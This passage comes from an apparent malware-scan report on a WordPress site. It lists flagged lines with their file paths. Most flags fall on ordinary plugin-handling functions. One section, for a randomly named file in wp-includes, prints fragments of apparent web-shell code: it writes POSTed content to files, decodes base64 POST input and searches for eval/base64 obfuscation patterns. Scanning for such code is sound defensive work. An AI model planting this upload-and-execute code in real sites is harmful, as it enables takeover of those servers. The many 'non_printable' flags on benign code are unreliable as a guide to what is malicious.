</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 809</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_action_deprecated</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$replacement </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 820</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions </span><span style="color: #007700">for </span><span style="color: #0000BB">handling plugins</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 833</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The name of a plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 855</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the path was able to be registered</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 872</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_register_plugin_realpath</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 903</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string the filesystem path of the directory that contains the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 905</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 906</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">example_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 915</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string the URL path of the directory that contains the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 917</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">plugins_url</span><span style="color: #007700">( </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$file </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 92</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'some value'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 937</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hooked to the </span><span style="color: #DD0000">'activate_PLUGIN' </span><span style="color: #0000BB">action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_activation_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hooked to the </span><span style="color: #DD0000">'deactivate_PLUGIN' </span><span style="color: #0000BB">action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_deactivation_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">when</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will be run during the uninstallation process</span><span style="color: #007700">. </span><span style="color: #0000BB">The plugin should not</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 97</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">example_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$arg2 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 993</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_uninstall_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">, </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Only a static class method or function can be used in an uninstall hook.' </span><span style="color: #007700">), </span><span style="color: #DD0000">'3.1.0' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maybe_modified_value</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_44").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/YVC3ZrbQfiG.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_45" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
